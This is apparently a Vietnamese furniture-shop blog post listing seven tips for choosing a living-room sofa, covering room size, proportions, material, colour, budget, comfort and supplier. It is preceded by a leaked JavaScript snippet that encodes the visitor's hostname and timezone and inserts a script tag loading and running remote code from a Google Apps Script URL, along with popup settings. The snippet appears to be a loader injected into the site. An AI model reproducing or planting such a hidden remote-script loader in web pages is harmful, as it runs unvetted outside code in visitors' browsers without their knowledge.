var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

7 điều nên làm khi chuẩn bị mua ghế sofa phòng khách

 Ghế sofa phòng khách là một đồ dùng quan trọng, là nơi tiếp khách cũng như quây quần của gia đình. Vì thế, khi chọn mua sofa phòng khách, chúng ta đều mong muốn có được một bộ ghế có công năng sử dụng cao mà thiết kế lại đẹp, hoàn hảo. Với 7 điều lưu ý dưới đây, hy vọng bạn sẽ tìm được mẫu sofa ưng ý, phù hợp.

1. Đo diện tích phòng trước khi mua sofa phòng khách

7 điều nên làm khi chuẩn bị mua ghế sofa phòng khách
Đo kích thước phòng, phác thảo vị trí sofa

Trước khi đi mua sofa, bạn nên đo diện tích phòng chính xác để chọn lựa được mẫu sofa trong ngưỡng phù hợp. Với những không gian có diện tích khác nhau, việc lựa chọn kiểu dáng, màu sắc, kích thước…cũng sẽ cần chỉ số phù hợp riêng. Ví dụ như phòng khách nhỏ, diện tích 15-20m2 nên chọn sofa văng hay sofa góc nhỏ sẽ cân đối hơn.

2. Tỷ lệ sofa cân đối

Sau khi đo đạc diện tích phòng, bạn nghiên cứu chọn tỷ lệ sofa cân đối và khi mua sắm thì nên chọn theo những ngưỡng tỷ lệ này. Đừng nên chỉ chú ý đến thiết kế đẹp mà mua sofa quá lớn, không phù hợp với phòng khách nhỏ của bạn và ngược lại.

7 điều nên làm khi chuẩn bị mua ghế sofa phòng khách
Chọn sofa kích thước cân đối

3. Nghiên cứu chất liệu sofa trước khi mua

Sofa hiện nay có sofa da và sofa vải với những đặc điểm khác biệt nhau. Vì thế, bạn nên nghiên cứu chất liệu phù hợp với gia đình trước khi mua. Ví dụ gia đình thích độ mềm mại và sang trọng của sofa da cao cấp hay thích độ mộc mạc, thân thiện của sofa vải. Đồng thời nếu không có nhiều thời gian vệ sinh lau dọn thì nên chọn sofa da dễ vệ sinh hơn so với sofa nỉ thấm nước. Hay nhà tầng cao chọn sofa nỉ ấm áp còn nhà tầng thấp thường nhiều bụi có thể chọn sofa da…

7 điều nên làm khi chuẩn bị mua ghế sofa phòng khách
Chọn chất liệu sofa phù hợp

Chất liệu sofa cũng ảnh hưởng đến giá thành. Sofa da thật chất lượng cao, giá mắc còn sofa da giả có nhiều loại cần lưu ý kỹ, sofa nỉ giá rẻ hơn, dễ mua hơn. 

4. Nên chọn sofa màu gì, phong cách gì?

Đây cũng là câu hỏi cần trả lời trước khi đi mua sofa. Không nhất thiết phải cụ thể màu gì nhưng bạn cần chọn màu hài hòa với không gian, nghiên cứu chọn màu nổi bật và ấn tượng hay nhẹ nhàng, thanh lịch, tăng hiệu quả mở rộng phòng khách là điều nên chú ý.

7 điều nên làm khi chuẩn bị mua ghế sofa phòng khách
Chọn màu sắc sofa đẹp, phong cách tốt

Với phong cách sofa, có kiểu cổ điển hay hiện đại, sáng tạo riêng. Bạn nên chọn phù hợp với phong cách thiết kế nội thất nhà mình sẽ hài hòa hơn, đồng bộ đẹp mắt.

5. Xác định kinh phí sẽ bỏ ra

Từ chất liệu, kích thước, kiểu dáng sẽ có những mức giá khác nhau do đó khi mua sắm, mức ngưỡng kinh phí bạn sẽ bỏ ra là bao nhiêu cũng quyết định việc bạn chọn được chiếc sofa như thế nào. Với những yếu tố tỉ mỉ như thế, bạn sẽ biết mình cần sofa ra sao cho phòng khách của mình, không mất nhiều thời gian băn khoăn với hàng ngàn mẫu sofa như hiện nay.

7 điều nên làm khi chuẩn bị mua ghế sofa phòng khách
Xác định kinh phí của bạn

6. Mua sofa thoải mái, ngồi thử trước khi mua

Trước khi quyết định mua ghế sofa phòng khách, bạn nên ngồi thử để cảm nhận sự thoải mái. Khi mua sắm, đừng chỉ nhìn thấy đẹp mà mua, hãy quan tâm nhiều đến sự thoải mái để khi sử dụng lâu dài, bạn vẫn luôn yêu thích chiếc sofa đó. 

7 điều nên làm khi chuẩn bị mua ghế sofa phòng khách
Chọn mua sofa thoải mái nhất

7. Chọn đơn vị cung cấp sofa nào?

Địa chỉ cung cấp sofa rất quan trọng để đảm bảo được chất lượng và giá thành khi mua sắm. Bạn nên tham khảo qua người thân, bạn bè và trên Internet về các công ty cung cấp sofa, đến xem hàng trực tiếp nếu được và nghiên cứu chọn mua phù hợp.

Quý vị có thể tham khảo những mẫu sofa đẹp tại hà nội ở địa chỉ Số 321 Trường Chinh – Thanh Xuân – Hà Nội để chọn mua phù hợp với nhu cầu của mình!

Nội Thất Xinh với đội ngũ tư vấn chuyên nghiệp, các kiến trúc sư giàu kinh nghiệm sẽ tư vấn giúp bạn mẫu sofa phù hợp nhất với ngôi nhà của mình, đảm bảo độ thoải mái, thư giãn và trang trí đẹp, hài hòa!

===>>> Chọn bàn ghế phòng ăn đẹp cho chung cư hiện đại như thế nào?